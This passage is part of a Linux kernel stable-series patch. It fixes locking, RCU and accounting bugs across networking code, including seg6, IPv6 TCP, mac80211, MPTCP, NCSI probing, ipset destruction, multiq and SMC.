+ 	err = skb_cow_head(skb, LL_RESERVED_SPACE(dst->dev));
+ 	if (unlikely(err))
+@@ -537,9 +535,9 @@ static int seg6_output_core(struct net *net, struct sock *sk,
+ 
+ 	slwt = seg6_lwt_lwtunnel(orig_dst->lwtstate);
+ 
+-	preempt_disable();
++	local_bh_disable();
+ 	dst = dst_cache_get(&slwt->cache);
+-	preempt_enable();
++	local_bh_enable();
+ 
+ 	if (unlikely(!dst)) {
+ 		struct ipv6hdr *hdr = ipv6_hdr(skb);
+@@ -559,9 +557,9 @@ static int seg6_output_core(struct net *net, struct sock *sk,
+ 			goto drop;
+ 		}
+ 
+-		preempt_disable();
++		local_bh_disable();
+ 		dst_cache_set_ip6(&slwt->cache, dst, &fl6.saddr);
+-		preempt_enable();
++		local_bh_enable();
+ 	}
+ 
+ 	skb_dst_drop(skb);
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index ba9a22db5805c..4b0e05349862d 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -1291,7 +1291,6 @@ static struct sock *tcp_v6_syn_recv_sock(const struct sock *sk, struct sk_buff *
+ 	 */
+ 
+ 	newsk->sk_gso_type = SKB_GSO_TCPV6;
+-	ip6_dst_store(newsk, dst, NULL, NULL);
+ 	inet6_sk_rx_dst_set(newsk, skb);
+ 
+ 	inet_sk(newsk)->pinet6 = tcp_inet6_sk(newsk);
+@@ -1302,6 +1301,8 @@ static struct sock *tcp_v6_syn_recv_sock(const struct sock *sk, struct sk_buff *
+ 
+ 	memcpy(newnp, np, sizeof(struct ipv6_pinfo));
+ 
++	ip6_dst_store(newsk, dst, NULL, NULL);
++
+ 	newsk->sk_v6_daddr = ireq->ir_v6_rmt_addr;
+ 	newnp->saddr = ireq->ir_v6_loc_addr;
+ 	newsk->sk_v6_rcv_saddr = ireq->ir_v6_loc_addr;
+diff --git a/net/mac80211/he.c b/net/mac80211/he.c
+index 0322abae08250..147ff0f71b9bb 100644
+--- a/net/mac80211/he.c
++++ b/net/mac80211/he.c
+@@ -231,15 +231,21 @@ ieee80211_he_spr_ie_to_bss_conf(struct ieee80211_vif *vif,
+ 
+ 	if (!he_spr_ie_elem)
+ 		return;
++
++	he_obss_pd->sr_ctrl = he_spr_ie_elem->he_sr_control;
+ 	data = he_spr_ie_elem->optional;
+ 
+ 	if (he_spr_ie_elem->he_sr_control &
+ 	    IEEE80211_HE_SPR_NON_SRG_OFFSET_PRESENT)
+-		data++;
++		he_obss_pd->non_srg_max_offset = *data++;
++
+ 	if (he_spr_ie_elem->he_sr_control &
+ 	    IEEE80211_HE_SPR_SRG_INFORMATION_PRESENT) {
+-		he_obss_pd->max_offset = *data++;
+ 		he_obss_pd->min_offset = *data++;
++		he_obss_pd->max_offset = *data++;
++		memcpy(he_obss_pd->bss_color_bitmap, data, 8);
++		data += 8;
++		memcpy(he_obss_pd->partial_bssid_bitmap, data, 8);
+ 		he_obss_pd->enable = true;
+ 	}
+ }
+diff --git a/net/mac80211/mesh_pathtbl.c b/net/mac80211/mesh_pathtbl.c
+index 69d5e1ec6edef..e7b9dcf30adc9 100644
+--- a/net/mac80211/mesh_pathtbl.c
++++ b/net/mac80211/mesh_pathtbl.c
+@@ -723,10 +723,23 @@ void mesh_path_discard_frame(struct ieee80211_sub_if_data *sdata,
+  */
+ void mesh_path_flush_pending(struct mesh_path *mpath)
+ {
++	struct ieee80211_sub_if_data *sdata = mpath->sdata;
++	struct ieee80211_if_mesh *ifmsh = &sdata->u.mesh;
++	struct mesh_preq_queue *preq, *tmp;
+ 	struct sk_buff *skb;
+ 
+ 	while ((skb = skb_dequeue(&mpath->frame_queue)) != NULL)
+ 		mesh_path_discard_frame(mpath->sdata, skb);
++
++	spin_lock_bh(&ifmsh->mesh_preq_queue_lock);
++	list_for_each_entry_safe(preq, tmp, &ifmsh->preq_queue.list, list) {
++		if (ether_addr_equal(mpath->dst, preq->dst)) {
++			list_del(&preq->list);
++			kfree(preq);
++			--ifmsh->preq_queue_len;
++		}
++	}
++	spin_unlock_bh(&ifmsh->mesh_preq_queue_lock);
+ }
+ 
+ /**
+diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
+index bd56015b29258..f388b39531748 100644
+--- a/net/mac80211/sta_info.c
++++ b/net/mac80211/sta_info.c
+@@ -1555,7 +1555,7 @@ void ieee80211_sta_ps_deliver_wakeup(struct sta_info *sta)
+ 	skb_queue_head_init(&pending);
+ 
+ 	/* sync with ieee80211_tx_h_unicast_ps_buf */
+-	spin_lock(&sta->ps_lock);
++	spin_lock_bh(&sta->ps_lock);
+ 	/* Send all buffered frames to the station */
+ 	for (ac = 0; ac < IEEE80211_NUM_ACS; ac++) {
+ 		int count = skb_queue_len(&pending), tmp;
+@@ -1584,7 +1584,7 @@ void ieee80211_sta_ps_deliver_wakeup(struct sta_info *sta)
+ 	 */
+ 	clear_sta_flag(sta, WLAN_STA_PSPOLL);
+ 	clear_sta_flag(sta, WLAN_STA_UAPSD);
+-	spin_unlock(&sta->ps_lock);
++	spin_unlock_bh(&sta->ps_lock);
+ 
+ 	atomic_dec(&ps->num_sta_ps);
+ 
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 3328870b0c1f8..3e2cbf0e6ce99 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -685,6 +685,7 @@ static void mptcp_pm_nl_add_addr_received(struct mptcp_sock *msk)
+ 	unsigned int add_addr_accept_max;
+ 	struct mptcp_addr_info remote;
+ 	unsigned int subflows_max;
++	bool sf_created = false;
+ 	int i, nr;
+ 
+ 	add_addr_accept_max = mptcp_pm_get_add_addr_accept_max(msk);
+@@ -710,15 +711,18 @@ static void mptcp_pm_nl_add_addr_received(struct mptcp_sock *msk)
+ 	 */
+ 	nr = fill_local_addresses_vec(msk, addrs);
+ 
+-	msk->pm.add_addr_accepted++;
+-	if (msk->pm.add_addr_accepted >= add_addr_accept_max ||
+-	    msk->pm.subflows >= subflows_max)
+-		WRITE_ONCE(msk->pm.accept_addr, false);
+-
+ 	spin_unlock_bh(&msk->pm.lock);
+ 	for (i = 0; i < nr; i++)
+-		__mptcp_subflow_connect(sk, &addrs[i], &remote);
++		if (__mptcp_subflow_connect(sk, &addrs[i], &remote) == 0)
++			sf_created = true;
+ 	spin_lock_bh(&msk->pm.lock);
++
++	if (sf_created) {
++		msk->pm.add_addr_accepted++;
++		if (msk->pm.add_addr_accepted >= add_addr_accept_max ||
++		    msk->pm.subflows >= subflows_max)
++			WRITE_ONCE(msk->pm.accept_addr, false);
++	}
+ }
+ 
+ void mptcp_pm_nl_addr_send_ack(struct mptcp_sock *msk)
+@@ -820,10 +824,13 @@ static void mptcp_pm_nl_rm_addr_or_subflow(struct mptcp_sock *msk,
+ 			spin_lock_bh(&msk->pm.lock);
+ 
+ 			removed = true;
+-			__MPTCP_INC_STATS(sock_net(sk), rm_type);
++			if (rm_type == MPTCP_MIB_RMSUBFLOW)
++				__MPTCP_INC_STATS(sock_net(sk), rm_type);
+ 		}
+ 		if (rm_type == MPTCP_MIB_RMSUBFLOW)
+ 			__set_bit(rm_id ? rm_id : msk->mpc_endpoint_id, msk->pm.id_avail_bitmap);
++		else if (rm_type == MPTCP_MIB_RMADDR)
++			__MPTCP_INC_STATS(sock_net(sk), rm_type);
+ 		if (!removed)
+ 			continue;
+ 
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index b6815610a6fa1..d6f3e1b9e8442 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -3757,6 +3757,7 @@ static int mptcp_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+ 
+ 	WRITE_ONCE(msk->write_seq, subflow->idsn);
+ 	WRITE_ONCE(msk->snd_nxt, subflow->idsn);
++	WRITE_ONCE(msk->snd_una, subflow->idsn);
+ 	if (likely(!__mptcp_check_fallback(msk)))
+ 		MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_MPCAPABLEACTIVE);
+ 
+diff --git a/net/ncsi/internal.h b/net/ncsi/internal.h
+index 374412ed780b6..ef0f8f73826f5 100644
+--- a/net/ncsi/internal.h
++++ b/net/ncsi/internal.h
+@@ -325,6 +325,7 @@ struct ncsi_dev_priv {
+ 	spinlock_t          lock;            /* Protect the NCSI device    */
+ 	unsigned int        package_probe_id;/* Current ID during probe    */
+ 	unsigned int        package_num;     /* Number of packages         */
++	unsigned int        channel_probe_id;/* Current cahnnel ID during probe */
+ 	struct list_head    packages;        /* List of packages           */
+ 	struct ncsi_channel *hot_channel;    /* Channel was ever active    */
+ 	struct ncsi_request requests[256];   /* Request table              */
+@@ -343,6 +344,7 @@ struct ncsi_dev_priv {
+ 	bool                multi_package;   /* Enable multiple packages   */
+ 	bool                mlx_multi_host;  /* Enable multi host Mellanox */
+ 	u32                 package_whitelist; /* Packages to configure    */
++	unsigned char       channel_count;     /* Num of channels to probe   */
+ };
+ 
+ struct ncsi_cmd_arg {
+diff --git a/net/ncsi/ncsi-manage.c b/net/ncsi/ncsi-manage.c
+index 80713febfac6d..760b33fa03a8b 100644
+--- a/net/ncsi/ncsi-manage.c
++++ b/net/ncsi/ncsi-manage.c
+@@ -510,17 +510,19 @@ static void ncsi_suspend_channel(struct ncsi_dev_priv *ndp)
+ 
+ 		break;
+ 	case ncsi_dev_state_suspend_gls:
+-		ndp->pending_req_num = np->channel_num;
++		ndp->pending_req_num = 1;
+ 
+ 		nca.type = NCSI_PKT_CMD_GLS;
+ 		nca.package = np->id;
++		nca.channel = ndp->channel_probe_id;
++		ret = ncsi_xmit_cmd(&nca);
++		if (ret)
++			goto error;
++		ndp->channel_probe_id++;
+ 
+-		nd->state = ncsi_dev_state_suspend_dcnt;
+-		NCSI_FOR_EACH_CHANNEL(np, nc) {
+-			nca.channel = nc->id;
+-			ret = ncsi_xmit_cmd(&nca);
+-			if (ret)
+-				goto error;
++		if (ndp->channel_probe_id == ndp->channel_count) {
++			ndp->channel_probe_id = 0;
++			nd->state = ncsi_dev_state_suspend_dcnt;
+ 		}
+ 
+ 		break;
+@@ -689,8 +691,6 @@ static int set_one_vid(struct ncsi_dev_priv *ndp, struct ncsi_channel *nc,
+ 	return 0;
+ }
+ 
+-#if IS_ENABLED(CONFIG_NCSI_OEM_CMD_KEEP_PHY)
+-
+ static int ncsi_oem_keep_phy_intel(struct ncsi_cmd_arg *nca)
+ {
+ 	unsigned char data[NCSI_OEM_INTEL_CMD_KEEP_PHY_LEN];
+@@ -716,10 +716,6 @@ static int ncsi_oem_keep_phy_intel(struct ncsi_cmd_arg *nca)
+ 	return ret;
+ }
+ 
+-#endif
+-
+-#if IS_ENABLED(CONFIG_NCSI_OEM_CMD_GET_MAC)
+-
+ /* NCSI OEM Command APIs */
+ static int ncsi_oem_gma_handler_bcm(struct ncsi_cmd_arg *nca)
+ {
+@@ -856,8 +852,6 @@ static int ncsi_gma_handler(struct ncsi_cmd_arg *nca, unsigned int mf_id)
+ 	return nch->handler(nca);
+ }
+ 
+-#endif /* CONFIG_NCSI_OEM_CMD_GET_MAC */
+-
+ /* Determine if a given channel from the channel_queue should be used for Tx */
+ static bool ncsi_channel_is_tx(struct ncsi_dev_priv *ndp,
+ 			       struct ncsi_channel *nc)
+@@ -1039,20 +1033,18 @@ static void ncsi_configure_channel(struct ncsi_dev_priv *ndp)
+ 			goto error;
+ 		}
+ 
+-		nd->state = ncsi_dev_state_config_oem_gma;
++		nd->state = IS_ENABLED(CONFIG_NCSI_OEM_CMD_GET_MAC)
++			  ? ncsi_dev_state_config_oem_gma
++			  : ncsi_dev_state_config_clear_vids;
+ 		break;
+ 	case ncsi_dev_state_config_oem_gma:
+ 		nd->state = ncsi_dev_state_config_clear_vids;
+-		ret = -1;
+ 
+-#if IS_ENABLED(CONFIG_NCSI_OEM_CMD_GET_MAC)
+ 		nca.type = NCSI_PKT_CMD_OEM;
+ 		nca.package = np->id;
+ 		nca.channel = nc->id;
+ 		ndp->pending_req_num = 1;
+ 		ret = ncsi_gma_handler(&nca, nc->version.mf_id);
+-#endif /* CONFIG_NCSI_OEM_CMD_GET_MAC */
+-
+ 		if (ret < 0)
+ 			schedule_work(&ndp->work);
+ 
+@@ -1350,7 +1342,6 @@ static void ncsi_probe_channel(struct ncsi_dev_priv *ndp)
+ {
+ 	struct ncsi_dev *nd = &ndp->ndev;
+ 	struct ncsi_package *np;
+-	struct ncsi_channel *nc;
+ 	struct ncsi_cmd_arg nca;
+ 	unsigned char index;
+ 	int ret;
+@@ -1404,7 +1395,6 @@ static void ncsi_probe_channel(struct ncsi_dev_priv *ndp)
+ 
+ 		schedule_work(&ndp->work);
+ 		break;
+-#if IS_ENABLED(CONFIG_NCSI_OEM_CMD_GET_MAC)
+ 	case ncsi_dev_state_probe_mlx_gma:
+ 		ndp->pending_req_num = 1;
+ 
+@@ -1429,25 +1419,6 @@ static void ncsi_probe_channel(struct ncsi_dev_priv *ndp)
+ 
+ 		nd->state = ncsi_dev_state_probe_cis;
+ 		break;
+-#endif /* CONFIG_NCSI_OEM_CMD_GET_MAC */
+-	case ncsi_dev_state_probe_cis:
+-		ndp->pending_req_num = NCSI_RESERVED_CHANNEL;
+-
+-		/* Clear initial state */
+-		nca.type = NCSI_PKT_CMD_CIS;
+-		nca.package = ndp->active_package->id;
+-		for (index = 0; index < NCSI_RESERVED_CHANNEL; index++) {
+-			nca.channel = index;
+-			ret = ncsi_xmit_cmd(&nca);
+-			if (ret)
+-				goto error;
+-		}
+-
+-		nd->state = ncsi_dev_state_probe_gvi;
+-		if (IS_ENABLED(CONFIG_NCSI_OEM_CMD_KEEP_PHY))
+-			nd->state = ncsi_dev_state_probe_keep_phy;
+-		break;
+-#if IS_ENABLED(CONFIG_NCSI_OEM_CMD_KEEP_PHY)
+ 	case ncsi_dev_state_probe_keep_phy:
+ 		ndp->pending_req_num = 1;
+ 
+@@ -1460,15 +1431,17 @@ static void ncsi_probe_channel(struct ncsi_dev_priv *ndp)
+ 
+ 		nd->state = ncsi_dev_state_probe_gvi;
+ 		break;
+-#endif /* CONFIG_NCSI_OEM_CMD_KEEP_PHY */
++	case ncsi_dev_state_probe_cis:
+ 	case ncsi_dev_state_probe_gvi:
+ 	case ncsi_dev_state_probe_gc:
+ 	case ncsi_dev_state_probe_gls:
+ 		np = ndp->active_package;
+-		ndp->pending_req_num = np->channel_num;
++		ndp->pending_req_num = 1;
+ 
+-		/* Retrieve version, capability or link status */
+-		if (nd->state == ncsi_dev_state_probe_gvi)
++		/* Clear initial state Retrieve version, capability or link status */
++		if (nd->state == ncsi_dev_state_probe_cis)
++			nca.type = NCSI_PKT_CMD_CIS;
++		else if (nd->state == ncsi_dev_state_probe_gvi)
+ 			nca.type = NCSI_PKT_CMD_GVI;
+ 		else if (nd->state == ncsi_dev_state_probe_gc)
+ 			nca.type = NCSI_PKT_CMD_GC;
+@@ -1476,19 +1449,29 @@ static void ncsi_probe_channel(struct ncsi_dev_priv *ndp)
+ 			nca.type = NCSI_PKT_CMD_GLS;
+ 
+ 		nca.package = np->id;
+-		NCSI_FOR_EACH_CHANNEL(np, nc) {
+-			nca.channel = nc->id;
+-			ret = ncsi_xmit_cmd(&nca);
+-			if (ret)
+-				goto error;
+-		}
++		nca.channel = ndp->channel_probe_id;
++
++		ret = ncsi_xmit_cmd(&nca);
++		if (ret)
++			goto error;
+ 
+-		if (nd->state == ncsi_dev_state_probe_gvi)
++		if (nd->state == ncsi_dev_state_probe_cis) {
++			nd->state = ncsi_dev_state_probe_gvi;
++			if (IS_ENABLED(CONFIG_NCSI_OEM_CMD_KEEP_PHY) && ndp->channel_probe_id == 0)
++				nd->state = ncsi_dev_state_probe_keep_phy;
++		} else if (nd->state == ncsi_dev_state_probe_gvi) {
+ 			nd->state = ncsi_dev_state_probe_gc;
+-		else if (nd->state == ncsi_dev_state_probe_gc)
++		} else if (nd->state == ncsi_dev_state_probe_gc) {
+ 			nd->state = ncsi_dev_state_probe_gls;
+-		else
++		} else {
++			nd->state = ncsi_dev_state_probe_cis;
++			ndp->channel_probe_id++;
++		}
++
++		if (ndp->channel_probe_id == ndp->channel_count) {
++			ndp->channel_probe_id = 0;
+ 			nd->state = ncsi_dev_state_probe_dp;
++		}
+ 		break;
+ 	case ncsi_dev_state_probe_dp:
+ 		ndp->pending_req_num = 1;
+@@ -1789,6 +1772,7 @@ struct ncsi_dev *ncsi_register_dev(struct net_device *dev,
+ 		ndp->requests[i].ndp = ndp;
+ 		timer_setup(&ndp->requests[i].timer, ncsi_request_timeout, 0);
+ 	}
++	ndp->channel_count = NCSI_RESERVED_CHANNEL;
+ 
+ 	spin_lock_irqsave(&ncsi_dev_lock, flags);
+ 	list_add_tail_rcu(&ndp->node, &ncsi_dev_list);
+@@ -1822,6 +1806,7 @@ int ncsi_start_dev(struct ncsi_dev *nd)
+ 
+ 	if (!(ndp->flags & NCSI_DEV_PROBED)) {
+ 		ndp->package_probe_id = 0;
++		ndp->channel_probe_id = 0;
+ 		nd->state = ncsi_dev_state_probe;
+ 		schedule_work(&ndp->work);
+ 		return 0;
+diff --git a/net/ncsi/ncsi-rsp.c b/net/ncsi/ncsi-rsp.c
+index 480e80e3c2836..f22d67cb04d37 100644
+--- a/net/ncsi/ncsi-rsp.c
++++ b/net/ncsi/ncsi-rsp.c
+@@ -795,12 +795,13 @@ static int ncsi_rsp_handler_gc(struct ncsi_request *nr)
+ 	struct ncsi_rsp_gc_pkt *rsp;
+ 	struct ncsi_dev_priv *ndp = nr->ndp;
+ 	struct ncsi_channel *nc;
++	struct ncsi_package *np;
+ 	size_t size;
+ 
+ 	/* Find the channel */
+ 	rsp = (struct ncsi_rsp_gc_pkt *)skb_network_header(nr->rsp);
+ 	ncsi_find_package_and_channel(ndp, rsp->rsp.common.channel,
+-				      NULL, &nc);
++				      &np, &nc);
+ 	if (!nc)
+ 		return -ENODEV;
+ 
+@@ -835,6 +836,7 @@ static int ncsi_rsp_handler_gc(struct ncsi_request *nr)
+ 	 */
+ 	nc->vlan_filter.bitmap = U64_MAX;
+ 	nc->vlan_filter.n_vids = rsp->vlan_cnt;
++	np->ndp->channel_count = rsp->channel_cnt;
+ 
+ 	return 0;
+ }
+diff --git a/net/netfilter/ipset/ip_set_core.c b/net/netfilter/ipset/ip_set_core.c
+index f645da82d826e..649b8a5901e33 100644
+--- a/net/netfilter/ipset/ip_set_core.c
++++ b/net/netfilter/ipset/ip_set_core.c
+@@ -1174,23 +1174,50 @@ ip_set_setname_policy[IPSET_ATTR_CMD_MAX + 1] = {
+ 				    .len = IPSET_MAXNAMELEN - 1 },
+ };
+ 
++/* In order to return quickly when destroying a single set, it is split
++ * into two stages:
++ * - Cancel garbage collector
++ * - Destroy the set itself via call_rcu()
++ */
++
+ static void
+-ip_set_destroy_set(struct ip_set *set)
++ip_set_destroy_set_rcu(struct rcu_head *head)
+ {
+-	pr_debug("set: %s\n",  set->name);
++	struct ip_set *set = container_of(head, struct ip_set, rcu);
+ 
+-	/* Must call it without holding any lock */
+ 	set->variant->destroy(set);
+ 	module_put(set->type->me);
+ 	kfree(set);
+ }
+ 
+ static void
+-ip_set_destroy_set_rcu(struct rcu_head *head)
++_destroy_all_sets(struct ip_set_net *inst)
+ {
+-	struct ip_set *set = container_of(head, struct ip_set, rcu);
++	struct ip_set *set;
++	ip_set_id_t i;
++	bool need_wait = false;
+ 
+-	ip_set_destroy_set(set);
++	/* First cancel gc's: set:list sets are flushed as well */
++	for (i = 0; i < inst->ip_set_max; i++) {
++		set = ip_set(inst, i);
++		if (set) {
++			set->variant->cancel_gc(set);
++			if (set->type->features & IPSET_TYPE_NAME)
++				need_wait = true;
++		}
++	}
++	/* Must wait for flush to be really finished  */
++	if (need_wait)
++		rcu_barrier();
++	for (i = 0; i < inst->ip_set_max; i++) {
++		set = ip_set(inst, i);
++		if (set) {
++			ip_set(inst, i) = NULL;
++			set->variant->destroy(set);
++			module_put(set->type->me);
++			kfree(set);
++		}
++	}
+ }
+ 
+ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+@@ -1204,11 +1231,10 @@ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+ 	if (unlikely(protocol_min_failed(attr)))
+ 		return -IPSET_ERR_PROTOCOL;
+ 
+-
+ 	/* Commands are serialized and references are
+ 	 * protected by the ip_set_ref_lock.
+ 	 * External systems (i.e. xt_set) must call
+-	 * ip_set_put|get_nfnl_* functions, that way we
++	 * ip_set_nfnl_get_* functions, that way we
+ 	 * can safely check references here.
+ 	 *
+ 	 * list:set timer can only decrement the reference
+@@ -1216,8 +1242,6 @@ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+ 	 * without holding the lock.
+ 	 */
+ 	if (!attr[IPSET_ATTR_SETNAME]) {
+-		/* Must wait for flush to be really finished in list:set */
+-		rcu_barrier();
+ 		read_lock_bh(&ip_set_ref_lock);
+ 		for (i = 0; i < inst->ip_set_max; i++) {
+ 			s = ip_set(inst, i);
+@@ -1228,15 +1252,7 @@ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+ 		}
+ 		inst->is_destroyed = true;
+ 		read_unlock_bh(&ip_set_ref_lock);
+-		for (i = 0; i < inst->ip_set_max; i++) {
+-			s = ip_set(inst, i);
+-			if (s) {
+-				ip_set(inst, i) = NULL;
+-				/* Must cancel garbage collectors */
+-				s->variant->cancel_gc(s);
+-				ip_set_destroy_set(s);
+-			}
+-		}
++		_destroy_all_sets(inst);
+ 		/* Modified by ip_set_destroy() only, which is serialized */
+ 		inst->is_destroyed = false;
+ 	} else {
+@@ -1257,12 +1273,12 @@ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+ 		features = s->type->features;
+ 		ip_set(inst, i) = NULL;
+ 		read_unlock_bh(&ip_set_ref_lock);
++		/* Must cancel garbage collectors */
++		s->variant->cancel_gc(s);
+ 		if (features & IPSET_TYPE_NAME) {
+ 			/* Must wait for flush to be really finished  */
+ 			rcu_barrier();
+ 		}
+-		/* Must cancel garbage collectors */
+-		s->variant->cancel_gc(s);
+ 		call_rcu(&s->rcu, ip_set_destroy_set_rcu);
+ 	}
+ 	return 0;
+@@ -2367,30 +2383,25 @@ ip_set_net_init(struct net *net)
+ }
+ 
+ static void __net_exit
+-ip_set_net_exit(struct net *net)
++ip_set_net_pre_exit(struct net *net)
+ {
+ 	struct ip_set_net *inst = ip_set_pernet(net);
+ 
+-	struct ip_set *set = NULL;
+-	ip_set_id_t i;
+-
+ 	inst->is_deleted = true; /* flag for ip_set_nfnl_put */
++}
+ 
+-	nfnl_lock(NFNL_SUBSYS_IPSET);
+-	for (i = 0; i < inst->ip_set_max; i++) {
+-		set = ip_set(inst, i);
+-		if (set) {
+-			ip_set(inst, i) = NULL;
+-			set->variant->cancel_gc(set);
+-			ip_set_destroy_set(set);
+-		}
+-	}
+-	nfnl_unlock(NFNL_SUBSYS_IPSET);
++static void __net_exit
++ip_set_net_exit(struct net *net)
++{
++	struct ip_set_net *inst = ip_set_pernet(net);
++
++	_destroy_all_sets(inst);
+ 	kvfree(rcu_dereference_protected(inst->ip_set_list, 1));
+ }
+ 
+ static struct pernet_operations ip_set_net_ops = {
+ 	.init	= ip_set_net_init,
++	.pre_exit = ip_set_net_pre_exit,
+ 	.exit   = ip_set_net_exit,
+ 	.id	= &ip_set_net_id,
+ 	.size	= sizeof(struct ip_set_net),
+diff --git a/net/netfilter/ipset/ip_set_list_set.c b/net/netfilter/ipset/ip_set_list_set.c
+index 6bc7019982b05..e839c356bcb56 100644
+--- a/net/netfilter/ipset/ip_set_list_set.c
++++ b/net/netfilter/ipset/ip_set_list_set.c
+@@ -79,7 +79,7 @@ list_set_kadd(struct ip_set *set, const struct sk_buff *skb,
+ 	struct set_elem *e;
+ 	int ret;
+ 
+-	list_for_each_entry(e, &map->members, list) {
++	list_for_each_entry_rcu(e, &map->members, list) {
+ 		if (SET_WITH_TIMEOUT(set) &&
+ 		    ip_set_timeout_expired(ext_timeout(e, set)))
+ 			continue;
+@@ -99,7 +99,7 @@ list_set_kdel(struct ip_set *set, const struct sk_buff *skb,
+ 	struct set_elem *e;
+ 	int ret;
+ 
+-	list_for_each_entry(e, &map->members, list) {
++	list_for_each_entry_rcu(e, &map->members, list) {
+ 		if (SET_WITH_TIMEOUT(set) &&
+ 		    ip_set_timeout_expired(ext_timeout(e, set)))
+ 			continue;
+@@ -188,9 +188,10 @@ list_set_utest(struct ip_set *set, void *value, const struct ip_set_ext *ext,
+ 	struct list_set *map = set->data;
+ 	struct set_adt_elem *d = value;
+ 	struct set_elem *e, *next, *prev = NULL;
+-	int ret;
++	int ret = 0;
+ 
+-	list_for_each_entry(e, &map->members, list) {
++	rcu_read_lock();
++	list_for_each_entry_rcu(e, &map->members, list) {
+ 		if (SET_WITH_TIMEOUT(set) &&
+ 		    ip_set_timeout_expired(ext_timeout(e, set)))
+ 			continue;
+@@ -201,6 +202,7 @@ list_set_utest(struct ip_set *set, void *value, const struct ip_set_ext *ext,
+ 
+ 		if (d->before == 0) {
+ 			ret = 1;
++			goto out;
+ 		} else if (d->before > 0) {
+ 			next = list_next_entry(e, list);
+ 			ret = !list_is_last(&e->list, &map->members) &&
+@@ -208,9 +210,11 @@ list_set_utest(struct ip_set *set, void *value, const struct ip_set_ext *ext,
+ 		} else {
+ 			ret = prev && prev->id == d->refid;
+ 		}
+-		return ret;
++		goto out;
+ 	}
+-	return 0;
++out:
++	rcu_read_unlock();
++	return ret;
+ }
+ 
+ static void
+@@ -239,7 +243,7 @@ list_set_uadd(struct ip_set *set, void *value, const struct ip_set_ext *ext,
+ 
+ 	/* Find where to add the new entry */
+ 	n = prev = next = NULL;
+-	list_for_each_entry(e, &map->members, list) {
++	list_for_each_entry_rcu(e, &map->members, list) {
+ 		if (SET_WITH_TIMEOUT(set) &&
+ 		    ip_set_timeout_expired(ext_timeout(e, set)))
+ 			continue;
+@@ -316,9 +320,9 @@ list_set_udel(struct ip_set *set, void *value, const struct ip_set_ext *ext,
+ {
+ 	struct list_set *map = set->data;
+ 	struct set_adt_elem *d = value;
+-	struct set_elem *e, *next, *prev = NULL;
++	struct set_elem *e, *n, *next, *prev = NULL;
+ 
+-	list_for_each_entry(e, &map->members, list) {
++	list_for_each_entry_safe(e, n, &map->members, list) {
+ 		if (SET_WITH_TIMEOUT(set) &&
+ 		    ip_set_timeout_expired(ext_timeout(e, set)))
+ 			continue;
+@@ -424,14 +428,8 @@ static void
+ list_set_destroy(struct ip_set *set)
+ {
+ 	struct list_set *map = set->data;
+-	struct set_elem *e, *n;
+ 
+-	list_for_each_entry_safe(e, n, &map->members, list) {
+-		list_del(&e->list);
+-		ip_set_put_byindex(map->net, e->id);
+-		ip_set_ext_destroy(set, e);
+-		kfree(e);
+-	}
++	WARN_ON_ONCE(!list_empty(&map->members));
+ 	kfree(map);
+ 
+ 	set->data = NULL;
+diff --git a/net/sched/sch_multiq.c b/net/sched/sch_multiq.c
+index 75c9c860182b4..0d6649d937c9f 100644
+--- a/net/sched/sch_multiq.c
++++ b/net/sched/sch_multiq.c
+@@ -185,7 +185,7 @@ static int multiq_tune(struct Qdisc *sch, struct nlattr *opt,
+ 
+ 	qopt->bands = qdisc_dev(sch)->real_num_tx_queues;
+ 
+-	removed = kmalloc(sizeof(*removed) * (q->max_bands - q->bands),
++	removed = kmalloc(sizeof(*removed) * (q->max_bands - qopt->bands),
+ 			  GFP_KERNEL);
+ 	if (!removed)
+ 		return -ENOMEM;
+diff --git a/net/sched/sch_taprio.c b/net/sched/sch_taprio.c
+index 1d4638aa4254f..41187bbd25ee9 100644
+--- a/net/sched/sch_taprio.c
++++ b/net/sched/sch_taprio.c
+@@ -938,16 +938,13 @@ static int taprio_parse_mqprio_opt(struct net_device *dev,
+ {
+ 	int i, j;
+ 
+-	if (!qopt && !dev->num_tc) {
+-		NL_SET_ERR_MSG(extack, "'mqprio' configuration is necessary");
+-		return -EINVAL;
+-	}
+-
+-	/* If num_tc is already set, it means that the user already
+-	 * configured the mqprio part
+-	 */
+-	if (dev->num_tc)
++	if (!qopt) {
++		if (!dev->num_tc) {
++			NL_SET_ERR_MSG(extack, "'mqprio' configuration is necessary");
++			return -EINVAL;
++		}
+ 		return 0;
++	}
+ 
+ 	/* Verify num_tc is not out of max range */
+ 	if (qopt->num_tc > TC_MAX_QUEUE) {
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index b6609527dff62..e86db21fef6e5 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -462,29 +462,11 @@ static int smc_bind(struct socket *sock, struct sockaddr *uaddr,
+ static void smc_adjust_sock_bufsizes(struct sock *nsk, struct sock *osk,
+ 				     unsigned long mask)
+ {
+-	struct net *nnet = sock_net(nsk);
+-
+ 	nsk->sk_userlocks = osk->sk_userlocks;
+-	if (osk->sk_userlocks & SOCK_SNDBUF_LOCK) {
++	if (osk->sk_userlocks & SOCK_SNDBUF_LOCK)
+ 		nsk->sk_sndbuf = osk->sk_sndbuf;
+-	} else {
+-		if (mask == SK_FLAGS_SMC_TO_CLC)
+-			WRITE_ONCE(nsk->sk_sndbuf,
+-				   READ_ONCE(nnet->ipv4.sysctl_tcp_wmem[1]));
+-		else
+-			WRITE_ONCE(nsk->sk_sndbuf,
+-				   2 * READ_ONCE(nnet->smc.sysctl_wmem));
+-	}
+-	if (osk->sk_userlocks & SOCK_RCVBUF_LOCK) {
++	if (osk->sk_userlocks & SOCK_RCVBUF_LOCK)
+ 		nsk->sk_rcvbuf = osk->sk_rcvbuf;
